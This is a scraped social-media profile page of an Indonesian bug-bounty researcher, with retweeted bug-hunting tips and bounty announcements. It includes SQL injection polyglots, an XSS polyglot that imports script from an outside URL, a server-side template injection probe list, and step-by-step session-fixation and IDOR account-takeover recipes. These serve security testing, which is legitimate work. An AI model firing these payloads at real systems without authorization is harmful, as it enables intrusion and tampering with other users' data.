Olivia
Online
Santiko Kusnul Hakim
@getnow1986
@HackenProof Security Researcher
๐ฎ๐ฉ ind(o)p3nd3nt cybrscrty
Malang, Jawa Timur
Joined October 2022
448 Following
104 Followers
709 Posts
Allah the Great the Merciful.
While awaiting for my 2 reports on Google, Allah gives me 2 paid reports again with low severity decision. And still safe my position on top 2# with total 43 reports just from 1 target and top 130# @HackenProof global leaderboard.
Thanks to Allah azza wa jall and @HackenProof
After got top1# at Last Catch Summer Event last year (https://t.co/hu1Mhhp9X0), in this week I got my new achievement (one of my dream).
๐ Winners of the Summer Security: Last Catch Event!
It was our second community event, and this time over 1,200 hackers took part!
An unforgettable month - and now itโs time to announce the winners ๐
Who to follow
Reginald Jones
@Reginal34712548
entrepreneur/Digital Creator @SocialplugSouth
Joshua Xu 
@joshua_xu_
Co-Founder and CEO @HeyGen | Make visual storytelling accessible to all.
Coach Hag Sr.
@CoachHag11
Proverbs 3;5-6 Miles College Alumnus โ14 Offensive Coordinator at Fairfield High Preparatory School ๐๐๐
@RahmatQurishi This is Atlassian
$4,500 in March isnโt much. Good thing is, April gives us another chance to go harder.
Take some time and read about how a simple $500 Email verification bypass was escalated into a $1,500 because I kept expanding the impact through other reports.
๐ https://t.co/j2ZP873wiG
We found a "Stored XSS in Jira Work Management and Escalated it to Orginisation Takeover".
https://t.co/FoxlQ2dfry
#bugbounty #cybersecurity
@AmirMSafari Interesting discrepancy in node's qs module. Nice chall
https://t.co/fb5YHsgQmY
This should help people to figure solution :)
#SQL Injection Polyglots
(Tested on MySQL & MariaDB)
&1/*'/*"/**/||1#\
and-1/*'/*"/**/||1--+\
It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query).
Use it in ALL input fields at once.
Session Fixation โ Account Takeover
POC โ
1. Attacker generated a valid session ID before login
2. Sent the session link to the victim
3. Victim logged in using the same session
4. Server did not regenerate the session after authentication
Use this #XSS payload and pop alert boxes EVERYWHERE! ๐๐
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:https://t.co/GFfWFhdpK2))}//\76-->
โ ๏ธSSTI (Server Side Template Injection)
Payload List โ If evaluated as 49 - the target is vulnerable:
1. {7*7}
2. {7*7}
3. {{7*7}}
4. [[7*7]]
5. ${7*7}
6. @(7*7)
7. <?=7*7?>
8. <%= 7*7 %>
9. ${= 7*7}
10. {{= 7*7}}
11. ${{7*7}}
12. #{7*7}
13. [=7*7]
@Behi_Sec Intigriti
๐จ New Video Live ๐จ
Email Uniqueness Bypass via Invisible Unicode Character Leading to Account Takeover
https://t.co/oflafPqMaY
#BugBounty #CyberSecurity
here's an index of 460 common solidity vulnerabilities across 31 unique protocol types
scraped from over 10000 solodit findings
optimized for LLMs
https://t.co/3Wh3CyFzOf
IDOR in APPLE ๐
POC ->
1. Created two separate user accounts Account A (attacker), Account B (victim) on
https://t.co/veSFHH5zMp[.]com/publicLocator/deleteApplication
https://t.co/veSFHH5zMp[.]com/publicLocator/submitJoinForm
2. Logged in as Account B, submited the application form and captured the application ID of Account B
3. Now Log in as Account A and intercepted a request to the affected endpoint
4. Replaced Account Aโs application ID with Account Bโs application ID.
5. Forwarded the modified request
6. Server accepted the request without authorization validation
7. Logged back into Account B
8. Account Bโs data is modified or deleted without consent
Impact ->
Any authenticated user can modify or delete other usersโ data
Credited to the respected owner
#bugbounty #bughunting #bounty #hacking #ethicalhacking #infosec #cybersecurity #bugbountytips #bugbounty #bugbountytip #bughunting #infosecurity #OWASP #ApplicationSecurity #Bugcrowd #Hackerone #day_20
![viehgroup's tweet photo. IDOR in APPLE ๐
POC ->
1. Created two separate user accounts Account A (attacker), Account B (victim) on
https://t.co/veSFHH5zMp[.]com/publicLocator/deleteApplication
https://t.co/veSFHH5zMp[.]com/publicLocator/submitJoinForm
2. Logged in as Account B, submited the application form and captured the application ID of Account B
3. Now Log in as Account A and intercepted a request to the affected endpoint
4. Replaced Account Aโs application ID with Account Bโs application ID.
5. Forwarded the modified request
6. Server accepted the request without authorization validation
7. Logged back into Account B
8. Account Bโs data is modified or deleted without consent
Impact ->
Any authenticated user can modify or delete other usersโ data
Credited to the respected owner
#bugbounty #bughunting #bounty #hacking #ethicalhacking #infosec #cybersecurity #bugbountytips #bugbounty #bugbountytip #bughunting #infosecurity #OWASP #ApplicationSecurity #Bugcrowd #Hackerone #day_20](https://pbs.twimg.com/media/HA0J9bOaAAEt19-.png)
Last Seen Users on Sotwe
Maisarah
Seen from Malaysia
boby boti
Seen from Indonesia
Eceseclk
Seen from Turkey
Amateur Jacqueline ๐ก
Seen from Indonesia
ๆๆดๅฟ่
ๅงฌๅฎฎๅฎๅญ
Seen from United States
bigg baby ๐ธ๐ณ
เนเธซเธกเธตเธขเธงเธซเธเนเธฒเธงโจ
Seen from Thailand
Juan Tello
Seen from Spain
ุฌุงูุงู
Seen from United States
็ฑๅคงๅ
Seen from United States
Most Popular Users
Elon Musk
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.8M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers